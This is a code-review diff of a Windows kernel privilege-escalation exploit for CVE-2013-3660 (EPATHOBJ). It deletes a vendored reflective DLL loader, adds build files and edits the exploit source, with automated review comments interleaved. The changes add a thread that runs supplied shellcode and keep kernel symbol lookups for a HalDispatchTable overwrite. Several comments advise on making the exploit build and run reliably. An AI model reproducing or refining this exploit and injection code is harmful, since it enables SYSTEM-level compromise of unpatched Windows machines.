- if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
- {
- // get the VA of the modules NT Header
- uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
-
- // uiNameArray = the address of the modules export directory entry
- uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
-
- // get the VA of the export directory
- uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
-
- // get the VA for the array of addresses
- uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
-
- // use the import ordinal (- export ordinal base) as an index into the array of addresses
- uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
-
- // patch in the address for this imported function
- DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
- }
- else
- {
- // get the VA of this functions import by name struct
- uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
-
- // use GetProcAddress and patch in the address for this imported function
- DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
- }
- // get the next imported function
- uiValueA += sizeof( ULONG_PTR );
- if( uiValueD )
- uiValueD += sizeof( ULONG_PTR );
- }
-
- // get the next import
- uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
- }
-
- // STEP 5: process all of our images relocations...
-
- // calculate the base address delta and perform relocations (even if we load at desired image base)
- uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
-
- // uiValueB = the address of the relocation directory
- uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
-
- // check if their are any relocations present
- if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
- {
- // uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // and we itterate through all entries...
- while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
- {
- // uiValueA = the VA for this relocation block
- uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
-
- // uiValueB = number of entries in this relocation block
- uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
-
- // uiValueD is now the first entry in the current relocation block
- uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
-
- // we itterate through all the entries in the current block...
- while( uiValueB-- )
- {
- // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
- // we dont use a switch statement to avoid the compiler building a jump table
- // which would not be very position independent!
- if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
- *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
- *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
-#ifdef WIN_ARM
- // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
- {
- register DWORD dwInstruction;
- register DWORD dwAddress;
- register WORD wImm;
- // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
- dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
- // flip the words to get the instruction as expected
- dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
- // sanity chack we are processing a MOV instruction...
- if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
- {
- // pull out the encoded 16bit value (the high portion of the address-to-relocate)
- wImm = (WORD)( dwInstruction & 0x000000FF);
- wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
- wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
- wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
- // apply the relocation to the target address
- dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
- // now create a new instruction with the same opcode and register param.
- dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
- // patch in the relocated address...
- dwInstruction |= (DWORD)(dwAddress & 0x00FF);
- dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
- dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
- dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
- // now flip the instructions words and patch back into the code...
- *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
- }
- }
-#endif
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
- *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
- else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
- *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
-
- // get the next entry in the current relocation block
- uiValueD += sizeof( IMAGE_RELOC );
- }
-
- // get the next entry in the relocation directory
- uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
- }
- }
-
- // STEP 6: call our images entry point
-
- // uiValueA = the VA of our newly loaded DLL/EXE's entry point
- uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
-
- // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
- pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
-
- // call our respective entry point, fudging our hInstance value
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
- // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
- ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
-#else
- // if we are injecting an DLL via a stub we call DllMain with no parameter
- ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
-#endif
-
- // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
- return uiValueA;
-}
-//===============================================================================================//
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
-{
- BOOL bReturnValue = TRUE;
- switch( dwReason )
- {
- case DLL_QUERY_HMODULE:
- if( lpReserved != NULL )
- *(HMODULE *)lpReserved = hAppInstance;
- break;
- case DLL_PROCESS_ATTACH:
- hAppInstance = hinstDLL;
- break;
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return bReturnValue;
-}
-
-#endif
-//===============================================================================================//
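Review bot: deleting this vendored copy of the loader moves the exploit onto the shared ReflectiveDLLInjection tree, and two behaviours the rewritten DllMain in ppr_flatten_rec.c depends on must survive that switch: under REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR the loader calls `((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );`, which is the only way the payload address reaches elevator_complex_path, and the stock DllMain answers DLL_QUERY_HMODULE with hAppInstance. Please state in the commit message that the shared ReflectiveLoader.c keeps both, because the Ruby side now passes the payload pointer solely as the thread parameter. (Minor, and moot once deleted: the step comments jump from STEP 6 to STEP 8.)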
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
deleted file mode 100755
index b8eb22b0b1..0000000000
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.h
+++ /dev/null
@@ -1,202 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-#include "ReflectiveDLLInjection.h"
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH 0x6A4ABC5B
-#define NTDLLDLL_HASH 0x3CFA685D
-
-#define LOADLIBRARYA_HASH 0xEC0E4E8E
-#define GETPROCADDRESS_HASH 0x7C0DFCAA
-#define VIRTUALALLOC_HASH 0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
-
-#define IMAGE_REL_BASED_ARM_MOV32A 5
-#define IMAGE_REL_BASED_ARM_MOV32T 7
-
-#define ARM_MOV_MASK (DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
-#define ARM_MOVW 0xF2400000
-#define ARM_MOVT 0xF2C00000
-
-#define HASH_KEY 13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
- return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD hash( char * c )
-{
- register DWORD h = 0;
- do
- {
- h = ror( h );
- h += *c;
- } while( *++c );
-
- return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
- USHORT Length;
- USHORT MaximumLength;
- PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) )
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
- //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STR FullDllName;
- UNICODE_STR BaseDllName;
- ULONG Flags;
- SHORT LoadCount;
- SHORT TlsIndex;
- LIST_ENTRY HashTableEntry;
- ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
- DWORD dwLength;
- DWORD dwInitialized;
- LPVOID lpSsHandle;
- LIST_ENTRY InLoadOrderModuleList;
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
- struct _PEB_FREE_BLOCK * pNext;
- DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
- BYTE bInheritedAddressSpace;
- BYTE bReadImageFileExecOptions;
- BYTE bBeingDebugged;
- BYTE bSpareBool;
- LPVOID lpMutant;
- LPVOID lpImageBaseAddress;
- PPEB_LDR_DATA pLdr;
- LPVOID lpProcessParameters;
- LPVOID lpSubSystemData;
- LPVOID lpProcessHeap;
- PRTL_CRITICAL_SECTION pFastPebLock;
- LPVOID lpFastPebLockRoutine;
- LPVOID lpFastPebUnlockRoutine;
- DWORD dwEnvironmentUpdateCount;
- LPVOID lpKernelCallbackTable;
- DWORD dwSystemReserved;
- DWORD dwAtlThunkSListPtr32;
- PPEB_FREE_BLOCK pFreeList;
- DWORD dwTlsExpansionCounter;
- LPVOID lpTlsBitmap;
- DWORD dwTlsBitmapBits[2];
- LPVOID lpReadOnlySharedMemoryBase;
- LPVOID lpReadOnlySharedMemoryHeap;
- LPVOID lpReadOnlyStaticServerData;
- LPVOID lpAnsiCodePageData;
- LPVOID lpOemCodePageData;
- LPVOID lpUnicodeCaseTableData;
- DWORD dwNumberOfProcessors;
- DWORD dwNtGlobalFlag;
- LARGE_INTEGER liCriticalSectionTimeout;
- DWORD dwHeapSegmentReserve;
- DWORD dwHeapSegmentCommit;
- DWORD dwHeapDeCommitTotalFreeThreshold;
- DWORD dwHeapDeCommitFreeBlockThreshold;
- DWORD dwNumberOfHeaps;
- DWORD dwMaximumNumberOfHeaps;
- LPVOID lpProcessHeaps;
- LPVOID lpGdiSharedHandleTable;
- LPVOID lpProcessStarterHelper;
- DWORD dwGdiDCAttributeList;
- LPVOID lpLoaderLock;
- DWORD dwOSMajorVersion;
- DWORD dwOSMinorVersion;
- WORD wOSBuildNumber;
- WORD wOSCSDVersion;
- DWORD dwOSPlatformId;
- DWORD dwImageSubsystem;
- DWORD dwImageSubsystemMajorVersion;
- DWORD dwImageSubsystemMinorVersion;
- DWORD dwImageProcessAffinityMask;
- DWORD dwGdiHandleBuffer[34];
- LPVOID lpPostProcessInitRoutine;
- LPVOID lpTlsExpansionBitmap;
- DWORD dwTlsExpansionBitmapBits[32];
- DWORD dwSessionId;
- ULARGE_INTEGER liAppCompatFlags;
- ULARGE_INTEGER liAppCompatFlagsUser;
- LPVOID lppShimData;
- LPVOID lpAppCompatInfo;
- UNICODE_STR usCSDVersion;
- LPVOID lpActivationContextData;
- LPVOID lpProcessAssemblyStorageMap;
- LPVOID lpSystemDefaultActivationContextData;
- LPVOID lpSystemAssemblyStorageMap;
- DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
- WORD offset:12;
- WORD type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
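Review bot: the API hash constants, the ARM relocation defines and the private _PEB / LDR_DATA_TABLE_ENTRY / IMAGE_RELOC definitions removed here now have to come from the shared tree, yet the new project only adds `..\..\..\ReflectiveDLLInjection\common` to the include path. The new DllMain uses DLL_QUERY_HMODULE, which this header obtained through `#include "ReflectiveDLLInjection.h"`; confirm that header is the one under common/ so the build does not depend on a file that only the deleted dll/src copy reached.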
diff --git a/external/source/exploits/cve-2013-3660/make.msbuild b/external/source/exploits/cve-2013-3660/make.msbuild
new file mode 100755
index 0000000000..e620eef70f
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/make.msbuild
@@ -0,0 +1,18 @@
+
+
+
+ .\ppr_flatten_rec.sln
+
+
+
+
+
+
+
+
+
+
+
+
+
+
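Review bot: the element names of this msbuild file did not survive extraction, so only the `.\ppr_flatten_rec.sln` reference is reviewable here. Since make.bat invokes it with `msbuild.exe make.msbuild /target:%PLAT%` and the solution defines only Debug|Win32 and Release|Win32, make sure the non-x86 target exists and is a deliberate no-op rather than an msbuild error, because make.bat gates this build on `%ERRORLEVEL%` and a failure here would be silent for anything that follows.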
diff --git a/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln b/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
new file mode 100755
index 0000000000..b01875c989
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln
@@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Win32 = Debug|Win32
+ Release|Win32 = Release|Win32
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
+ {942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
similarity index 96%
rename from external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
rename to external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
index 11c4134bb4..505d9961d2 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h
@@ -418,19 +418,10 @@
# define WIN32_NO_STATUS
#endif
#include
-#include
-#include
-#include
-#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
-#include
-#pragma comment(lib, "gdi32")
-#pragma comment(lib, "kernel32")
-#pragma comment(lib, "user32")
-#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
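Review bot: dropping the four `#pragma comment(lib, ...)` lines for gdi32, kernel32, user32 and shell32 moves the link dependencies into the project, but the vcxproj's AdditionalDependencies names only `Mpr.lib;%(AdditionalDependencies)` and otherwise relies on the inherited default. The exploit still creates a DC (`HDC Device`) and a mutex, so it needs gdi32 and kernel32; either keep the pragmas here or list those libraries explicitly in the project. Nothing in the visible code references Mpr.lib, so it looks copied from another project and can go. The retained `#pragma comment(linker, "/SECTION:.text,ERW")` deserves a comment saying why the code section must be writable.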
@@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
static HANDLE Mutex;
static DWORD ComplexPathFinished = 0;
-// Log levels.
-typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
-
-BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
-
// Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
@@ -509,21 +495,24 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid;
PVOID *PsInitialSystemProcess;
-VOID elevator_complex_path();
+//#define DEBUGTRACE 1
-//#define DEBUGTRACE 1
-
-#ifdef DEBUGTRACE
-#define dprintf(...) real_dprintf(__VA_ARGS__)
-#else
-#define dprintf(...) do{}while(0);
-#endif
-
-static void real_dprintf(char *format, ...) {
- va_list args;
- char buffer[1024];
- va_start(args,format);
- vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
- strcat_s(buffer, sizeof(buffer), "\r\n");
- OutputDebugStringA(buffer);
-}
\ No newline at end of file
+// Log levels.
+typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
+
+#ifdef DEBUGTRACE
+VOID LogMessage(LEVEL Level, PCHAR Format, ...);
+
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+static void real_dprintf(char *format, ...) {
+ va_list args;
+ char buffer[1024];
+ va_start(args,format);
+ vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
+ strcat_s(buffer, sizeof(buffer), "\r\n");
+ OutputDebugStringA(buffer);
+}
+#else
+#define dprintf(...)
+#define LogMessage(...)
+#endif
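Review bot: the `#else` branch here defines `LogMessage(...)` as an empty macro, and ppr_flatten_rec.c repeats the identical `#else` / `#define LogMessage(...)` / `#endif` block after its own LogMessage definition; keep one copy, and the header is the right place since every includer needs it. Separately, `real_dprintf` is now only compiled under DEBUGTRACE and uses va_list, vsnprintf_s and strcat_s, while the first hunk of this rename removes four `#include` lines; check that a DEBUGTRACE build still sees stdio.h and stdarg.h (windows.h alone is not guaranteed to provide vsnprintf_s), otherwise the tracing build is broken until someone turns it on. Removing the `VOID elevator_complex_path();` prototype is fine because the definition in ppr_flatten_rec.c precedes DllMain.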
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
similarity index 90%
rename from external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
rename to external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
index 547fd1fd85..f4776eb046 100755
--- a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
+++ b/external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c
@@ -1,15 +1,15 @@
//===============================================================================================//
-// This is a stub for the actuall functionality of the DLL.
+// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
-// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
-// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
-// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
-//===============================================================================================//
-
-#include "ReflectiveLoader.h"
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "ComplexPath.h"
+// Purloined from ntstatus.h
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
+
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
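Review bot: `#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"` textually includes a .c file, so its file-scope symbols become part of this translation unit; that is presumably what lets the new DllMain assign hAppInstance without the `extern HINSTANCE hAppInstance;` the old stub needed. The relative path bypasses the project's AdditionalIncludeDirectories (which lists only `..\..\..\ReflectiveDLLInjection\common`), so a move of the shared tree breaks this include but not the header ones; consider adding dll\src to the include path and using the bare filename, as the deleted stub did with `#include "ReflectiveLoader.h"`. The two `#define`s correctly precede the include. The hand-rolled `STATUS_SUCCESS` replaces an include dropped from ComplexPath.h, which is fine only as long as it is the sole STATUS_ constant the exploit uses.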
@@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
}
}
-VOID elevator_complex_path()
+/*!
+ * @brief Helper thread function which runs the given payload directly.
+ * @param lpPayload The payload shellcode to execute.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
+ LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
+ VOID(*lpCode)() = (VOID(*)())lpPayload;
+ lpCode();
+ return ERROR_SUCCESS;
+}
+
+VOID elevator_complex_path(LPVOID lpPayload)
{
HANDLE Thread;
HDC Device;
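Review bot: execute_payload casts lpPayload straight to `VOID(*)()` and calls it with no NULL check; the only guard is the one in elevator_complex_path, so either check here as well or state in the @param that the pointer must be non-NULL. The declaration `VOID(*lpCode)() = (VOID(*)())lpPayload;` follows a statement (the LogMessage call), which needs C99 mixed declarations; the v120_xp toolset the new project selects accepts that, but the deleted rdi.sln targeted Visual C++ Express 2010, which does not, so move the declaration above the call if that toolchain is still used anywhere.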
@@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n");
+
+ if (lpPayload == NULL) {
+ LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
+ return;
+ }
+
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
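Review bot: the log tag at the new NULL check reads `[PRFLATTENREC]` while every other message in this file uses `[PPRFLATTENREC]`; fix the typo so the messages grep consistently. The check itself sits in the right place, after the banner and before any ntdll lookups, but since elevator_complex_path returns VOID the caller cannot tell "no payload supplied" from "exploit ran"; returning a BOOL would let DllMain log the difference.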
@@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
- HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
- PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
- PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
- PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+ HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+ PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+ PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
+ PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
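Review bot: the casts added here silence the pointer/ULONG mismatches but keep the 32-bit arithmetic (`(ULONG) GetProcAddress(KernelHandle, ...) - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase`), which is only safe because the Ruby module refuses x64 and WOW64 sessions; a one-line comment at the top of the function saying so would stop the next person from "fixing" it. More importantly, none of the four GetProcAddress results is checked in the visible lines: if one returns NULL (a kernel image without that export), the rebased value is ImageBase minus the user-mode load address and the later HalDispatchTable write lands on garbage. Add a NULL check after each lookup before the subtraction.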
@@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is
// available.
- while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
+ while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
